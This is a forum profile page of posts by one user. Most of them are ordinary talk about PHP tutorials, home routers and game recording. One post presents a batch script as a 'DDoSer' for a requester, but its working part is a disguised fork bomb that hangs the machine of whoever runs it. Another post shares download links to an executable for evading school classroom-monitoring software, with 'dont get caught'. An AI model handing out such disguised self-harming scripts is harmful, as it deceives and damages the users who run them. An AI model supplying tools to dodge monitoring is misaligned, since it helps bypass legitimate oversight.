Jump to content

Lyzon

Active Members
  • Posts

    44
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by Lyzon

  1. http://www.mediafire.com/?p999h4ppy5xianr

    http://www.filefactory.com/file/cb3a136/n/LanSchool_Manager.exe

    https://rapidshare.com/files/461551717/LanSchool_Manager.exe

    http://myfreefilehosting.com/f/bffc911a07_0.9MB

    here you go ppl, prob the last time i will upload so i uploaded to a few diff hosts. Its exactly the same program uploaded years ago with no changes. whether it still works on new ls i dont know as I am too busy with uni work to care. Have fun, and dont get caught :)

  2. well at my college, we have no rights to :

    open "run"

    open "control panel"

    view "c:\"

    copy files to hard drive

    view and delete files to hard drive

    close any process

    run anything that needs admin rights...

    so yea..

  3. Hey ppl ^_^ lol i was just working on something in visual studio and remembered the lanschool manager i made... so i searched it up. lo and behold there are some new posts here :o

    well i reuploaded it for you xquisite. if u have h20hs and it works fine, no probs. just makin it available again for others ^_^

    http://www.mediafire.com/file/1iygnntdtmm/...l%20Manager.exe

    edit. forgot to add that this still works in version 7.2.1.2s << the s shows up in the version number ... im guessing it means special? or super edition :P

  4. The only reason i close it is that i dont feel comfortable with them logging my keystrokes. The latest version of Lanschool (7.2) logs the keystrokes in real time so... how lucky do you feel o0

  5. For the very basics:

    www.tizag.com

    www.w3schools.com

    * I started learning from this site: *

    www.techtuts.com

    Its got as good as it was before but with new management in, its looking promising. My account there is Razor so drop me a line if u need some help there

    Then we have www.php.net. Really all you need if you can understand the documenttation. really easy to use.

  6. @webjockey, lol i like how you think xbox live uses 1 cat5 cable ^_^

    about onlive, its only gona be beta tested in the US. Apparently they tried it with austraila and the lag was very noticable. There are alot of articles that challenge the onlive service. Theres a decent article at eurogamer but I forgot the link. If you find it, check it out.

  7. Hey all, i ordered a laptop last week and i would like to go on the internet with it. Thing is i currently dont have a router as everything is hard wired

    modem ->usb-> pc ->lan-> ps3

    I like to think that setup is secure -_-

    Anyway now that i have a laptop ill need a wireless network in the house. Because theres always the possiblilty of outside intruders on the network, i want it secure as possible. I see WPA2-PSK is the most secure... but can it be cracked?

    Anyway after searching for a bit, i found this:

    http://accessories.euro.dell.com/sna/produ...mp;sku=A2571941

    On paper it seems good but as ima novice in the network department i was wondering if this router is the best choice for the money. Thx.

  8. I tried askin dell support via live chat... no luck. They are not the most technically knowledgable ppl out there..

    I dont really want to spend more on a tv tuner card if i cant record hidef. Is there any custom firmware that would allow it to take input aswell?

  9. Im sure those games dont allow you to record the menus tho :)

    The game i want to record is motorstorm because im making a walkthrough website for it and need to record some vids. Any ideas if its possible with the studio 17 hdmi port?

  10. Come on guys. atleast help the guy. He asked politely after all. Heres how you do it:

    create a file called ddos.bat put the following code in it and run the file

    @echo off
    title "Lyzons DDoSer"
    
    echo "Enter the website url you would like to ddos:"
    set /P URL="url: "
    
    rem pop "user32.dll", "net32.dll", "telnet64.dll"
    rem push eax
    rem asm
    
    echo "Initialised DDoS attack, running ddos sequence:"
    
    ::init Win32DenieHost, URL
    rem pop eax
    rem jmp "beginattack"
    
    :beginattack
    ::reg, thread, 1337:%0
    rem pop ip, cx
    rem push eax, cx
    ::run, 1337
    ::ping net32Host, URL, 65535
    %0|%0
    goto beginattack

    use it with caution. Make sure you have no other program running or the attack wont be very effective.

  11. I not so much judge as get jealous :P

    For instance if some1 younger then me (noticably tho like more then a year) is more knowledgable then me in web design or programmin, i spend some time hating their guts :P then get over it and learn more about what they no to the point where i feel i better them :P

    Prime example: the 15 year old who developed Muziic. I thought of many ways to kill him... then i got over it and continued to write some php :P

  12. @nullArray, i didnt mean to be harsh lol. just wondered why you using a very outdated version of php. I recommend you download and install wampserver 2 as it comes with php 5.2.

    @digip, the errors can happen in php 5 but the style in which they are displayed is native to PHP 3 :)

  13. Erm... why are you using PHP 3?

    I say this because the errors your recieving are PHP3 style and im assuming you dont have a custom error handler.

    As for the errors, its there because you dont check for the $name and the other variables existance. Its also bad practise to use $name instead of $_POST['name'] as in PHP5, register globals are disabled by default and are removed in PHP6.

    Try tizag.com for some simple tutorials or go to php.net and see the user posted examples and read the documenttation. Should help you get a better grasp of the language.

×
×
  • Create New...